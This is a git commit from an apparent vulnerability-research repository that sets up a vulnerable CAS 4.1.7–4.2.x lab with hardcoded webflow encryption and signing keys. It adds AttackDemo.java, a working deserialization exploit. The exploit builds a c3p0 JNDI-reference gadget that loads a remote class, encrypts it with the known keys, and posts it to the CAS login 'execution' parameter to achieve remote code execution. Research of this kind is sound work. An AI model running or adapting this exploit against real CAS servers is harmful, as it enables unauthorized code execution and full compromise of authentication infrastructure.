feat:cas-4.1.x~4.1.6 and 4.1.7~4.2.x 环境修复以及 attack demo

Author: threedr3am

.gitignore

@@ -2,3 +2,4 @@
 *.iml
 target
 cas/**/overlays
+cas/**/lib

README.md

@@ -65,4 +65,11 @@ tomcat ajp协议相关漏洞
 
 ### cas
 
-cas相关漏洞 
+cas相关漏洞 
+
+1. cas-4.1.x~4.1.6 反序列化漏洞（利用默认密钥）
+2. cas-4.1.7~4.2.x 反序列化漏洞（需要知道加密key和签名key）
+
+---
+
+### spring

cas/4.1.7-4.2.x/pom.xml

@@ -80,6 +80,26 @@
       <type>war</type>
       <scope>runtime</scope>
     </dependency>
+
+    <!-- https://mvnrepository.com/artifact/org.jasig.cas/cas-server-core-util -->
+    <dependency>
+      <groupId>org.jasig.cas</groupId>
+      <artifactId>cas-server-core-util</artifactId>
+      <version>4.2.7</version>
+    </dependency>
+
+    <!-- https://mvnrepository.com/artifact/org.jasig.cas/cas-server-webapp-support -->
+    <dependency>
+      <groupId>org.jasig.cas</groupId>
+      <artifactId>cas-server-webapp-support</artifactId>
+      <version>4.2.7</version>
+    </dependency>
+
+    <dependency>
+      <groupId>com.xyh</groupId>
+      <artifactId>common</artifactId>
+      <version>1.0-SNAPSHOT</version>
+    </dependency>
   </dependencies>
 
   <properties>

cas/4.1.7-4.2.x/src/main/java/com/threedr3am/bug/cas/AttackDemo.java

@@ -0,0 +1,205 @@
+package com.threedr3am.bug.cas;
+
+import com.mchange.v2.c3p0.PoolBackedDataSource;
+import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
+import com.threedr3am.bug.common.utils.HttpUtil;
+import com.threedr3am.bug.common.utils.Reflections;
+import com.unboundid.util.Base64;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.io.PrintWriter;
+import java.net.URL;
+import java.net.URLEncoder;
+import java.security.KeyStore;
+import java.sql.SQLException;
+import java.sql.SQLFeatureNotSupportedException;
+import java.util.logging.Logger;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import java.util.zip.GZIPInputStream;
+import java.util.zip.GZIPOutputStream;
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import javax.naming.Referenceable;
+import javax.sql.ConnectionPoolDataSource;
+import javax.sql.PooledConnection;
+import org.cryptacular.bean.BufferedBlockCipherBean;
+import org.cryptacular.bean.CipherBean;
+import org.cryptacular.bean.KeyStoreFactoryBean;
+import org.cryptacular.generator.sp80038a.RBGNonce;
+import org.cryptacular.io.URLResource;
+import org.cryptacular.spec.BufferedBlockCipherSpec;
+import org.jasig.cas.util.BinaryCipherExecutor;
+import org.jasig.cas.web.flow.CasWebflowCipherBean;
+import org.jasig.spring.webflow.plugin.Transcoder;
+
+/**
+ * @author threedr3am
+ */
+public class AttackDemo {
+
+  public static void main(String[] args) throws Exception {
+    WebflowCipherExecutor webflowCipherExecutor = new WebflowCipherExecutor("BjhXuZMDpvFqaYQl", "LQrGyGjxwnk-0fLEC4mjR1q_mX9CvPLyt9Siy_GfG592WgZc97wWOjifuslNbUdhU9h5dwac1n8nGoZh8yo2Dw", "AES");
+    CasWebflowCipherBean casWebflowCipherBean = new CasWebflowCipherBean(webflowCipherExecutor);
+    byte[] bytes = new EncryptedTranscoder(casWebflowCipherBean).encode(makeGadget("http://127.0.0.1:80:Calc"));
+    String base64 = Base64.encode(bytes);
+    String html = HttpUtil.get("http://localhost:8080/cas/login");
+    Matcher matcher = Pattern.compile("name=\"execution\" value=\"(.+?)\"").matcher(html);
+    if (matcher.find()) {
+      String execution = matcher.group(1);
+      if (execution != null && execution.length() > 0) {
+        String uuid = execution.split("_")[0];
+        System.out.println(HttpUtil.post("http://localhost:8080/cas/login", "execution=" + uuid + "_" + URLEncoder.encode(base64)));
+      }
+    }
+  }
+
+  public static Object makeGadget(String command) throws Exception {
+    int sep = command.lastIndexOf(':');
+    if ( sep < 0 ) {
+      throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
+    }
+
+    String url = command.substring(0, sep);
+    String className = command.substring(sep + 1);
+
+    PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
+    Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
+    return b;
+  }
+
+  private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
+
+    private String className;
+    private String url;
+
+    public PoolSource ( String className, String url ) {
+      this.className = className;
+      this.url = url;
+    }
+
+    public Reference getReference () throws NamingException {
+      return new Reference("exploit", this.className, this.url);
+    }
+
+    public PrintWriter getLogWriter () throws SQLException {return null;}
+    public void setLogWriter ( PrintWriter out ) throws SQLException {}
+    public void setLoginTimeout ( int seconds ) throws SQLException {}
+    public int getLoginTimeout () throws SQLException {return 0;}
+    public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
+    public PooledConnection getPooledConnection () throws SQLException {return null;}
+    public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
+
+  }
+
+
+  public static class EncryptedTranscoder implements Transcoder {
+    private CipherBean cipherBean;
+    private boolean compression = true;
+
+    public EncryptedTranscoder() throws IOException {
+      BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
+      bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
+      bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
+      bufferedBlockCipherBean.setKeyAlias("aes128");
+      bufferedBlockCipherBean.setKeyPassword("changeit");
+      bufferedBlockCipherBean.setNonce(new RBGNonce());
+      this.setCipherBean(bufferedBlockCipherBean);
+    }
+
+    public EncryptedTranscoder(CipherBean cipherBean) throws IOException {
+      this.setCipherBean(cipherBean);
+    }
+
+    public void setCompression(boolean compression) {
+      this.compression = compression;
+    }
+
+    protected void setCipherBean(CipherBean cipherBean) {
+      this.cipherBean = cipherBean;
+    }
+
+    public byte[] encode(Object o) throws IOException {
+      if (o == null) {
+        return new byte[0];
+      } else {
+        ByteArrayOutputStream outBuffer = new ByteArrayOutputStream();
+        ObjectOutputStream out = null;
+
+        try {
+          if (this.compression) {
+            out = new ObjectOutputStream(new GZIPOutputStream(outBuffer));
+          } else {
+            out = new ObjectOutputStream(outBuffer);
+          }
+
+          out.writeObject(o);
+        } finally {
+          if (out != null) {
+            out.close();
+          }
+
+        }
+
+        try {
+          return this.cipherBean.encrypt(outBuffer.toByteArray());
+        } catch (Exception var7) {
+          throw new IOException("Encryption error", var7);
+        }
+      }
+    }
+
+    public Object decode(byte[] encoded) throws IOException {
+      byte[] data;
+      try {
+        data = this.cipherBean.decrypt(encoded);
+      } catch (Exception var11) {
+        throw new IOException("Decryption error", var11);
+      }
+
+      ByteArrayInputStream inBuffer = new ByteArrayInputStream(data);
+      ObjectInputStream in = null;
+
+      Object var5;
+      try {
+        if (this.compression) {
+          in = new ObjectInputStream(new GZIPInputStream(inBuffer));
+        } else {
+          in = new ObjectInputStream(inBuffer);
+        }
+
+        var5 = in.readObject();
+      } catch (ClassNotFoundException var10) {
+        throw new IOException("Deserialization error", var10);
+      } finally {
+        if (in != null) {
+          in.close();
+        }
+
+      }
+
+      return var5;
+    }
+
+    protected KeyStore createAndPrepareKeyStore() {
+      KeyStoreFactoryBean ksFactory = new KeyStoreFactoryBean();
+      URL u = this.getClass().getResource("/etc/keystore.jceks");
+      ksFactory.setResource(new URLResource(u));
+      ksFactory.setType("JCEKS");
+      ksFactory.setPassword("changeit");
+      return ksFactory.newInstance();
+    }
+  }
+
+  public static class WebflowCipherExecutor extends BinaryCipherExecutor {
+
+    public WebflowCipherExecutor(String secretKeyEncryption, String secretKeySigning,
+        String secretKeyAlg) {
+      super(secretKeyEncryption, secretKeySigning);
+      this.setSecretKeyAlgorithm(secretKeyAlg);
+    }
+  }
+}

cas/4.1.7-4.2.x/src/webapp/WEB-INF/cas.properties renamed to cas/4.1.7-4.2.x/src/main/webapp/WEB-INF/cas.properties

@@ -183,10 +183,10 @@ server.prefix=${server.name}/cas
 # See the cas-servlet.xml file to understand how these properties are used.
 #
 # The encryption secret key. By default, must be a octet string of size 256.
-# webflow.encryption.key=
+webflow.encryption.key=BjhXuZMDpvFqaYQl
 
 # The signing secret key. By default, must be a octet string of size 512.
-# webflow.signing.key=
+webflow.signing.key=LQrGyGjxwnk-0fLEC4mjR1q_mX9CvPLyt9Siy_GfG592WgZc97wWOjifuslNbUdhU9h5dwac1n8nGoZh8yo2Dw
 
 ##
 # Remote User Authentication